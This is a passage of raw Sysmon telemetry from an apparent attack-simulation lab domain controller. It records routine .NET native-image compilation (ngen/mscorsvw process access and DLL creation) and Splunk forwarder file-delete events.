Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020994Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:43.022{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EB-60D3-F803-00000000CF01}7064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020993Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:43.006{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1EB-60D3-F803-00000000CF01}7064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020992Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:43.006{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EB-60D3-F803-00000000CF01}7064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000021007Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:44.600{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B67E9C4D88832C3B2D377736B8F54ADA,SHA256=A5FE5E5BB597835C4C7D6C009C8AE7E6132EEE837561C1FA013401C77FF166AB,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000021009Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:45.959{4DB9351A-A1EB-60D3-FB03-00000000CF01}92C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\5c-0\Microsoft.Windows.ServerManager.Common.dll2021-06-23 21:04:45.943 23542300x800000000000000021008Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:45.615{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD2E717AF64E1AAC67875A561B909267,SHA256=242238B897721EF931FB6A2B34B67E2199D1EF733CA39A402AC9968E5DD9E68F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021031Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.912{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EE-60D3-0104-00000000CF01}7076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021030Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.896{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1EE-60D3-0104-00000000CF01}7076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021029Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.896{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EE-60D3-0104-00000000CF01}7076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021028Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.834{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7F0829CDC056144F1460C2ABE463E49E,SHA256=CA01D86F65E9CAEADC614451D76E41C7CE29179B650D24D8ED1A80AC8596B48C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021027Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.818{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EE-60D3-0004-00000000CF01}5476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021026Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.787{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1EE-60D3-0004-00000000CF01}5476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021025Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.787{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EE-60D3-0004-00000000CF01}5476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021024Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:46.756{4DB9351A-A1EE-60D3-FF03-00000000CF01}7096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1bb8-0\Microsoft.Windows.ServerManager.DhcpServer.Plugin.dll2021-06-23 21:04:46.756 23542300x800000000000000021023Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.646{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69A2A9C071625C57CC677A807DA6F4BD,SHA256=8AB2ABA13C31CF425B27EFF0256939F8E0ED723D401D9BE2C681249DD70CAA5E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021022Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.522{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EE-60D3-FF03-00000000CF01}7096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021021Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.506{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1EE-60D3-FF03-00000000CF01}7096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021020Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.506{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EE-60D3-FF03-00000000CF01}7096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021019Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.412{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EE-60D3-FE03-00000000CF01}6540C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021018Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.381{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1EE-60D3-FE03-00000000CF01}6540C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021017Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.381{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EE-60D3-FE03-00000000CF01}6540C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021016Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:46.365{4DB9351A-A1EE-60D3-FD03-00000000CF01}5768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1688-0\Microsoft.Windows.ServerManager.Deployment.Extension.dll2021-06-23 21:04:46.365 10341000x800000000000000021015Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.261{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EE-60D3-FD03-00000000CF01}5768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021014Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.240{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1EE-60D3-FD03-00000000CF01}5768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021013Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.240{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EE-60D3-FD03-00000000CF01}5768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021012Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.178{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EE-60D3-FC03-00000000CF01}7060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021011Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.163{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1EE-60D3-FC03-00000000CF01}7060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021010Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.163{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EE-60D3-FC03-00000000CF01}7060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\F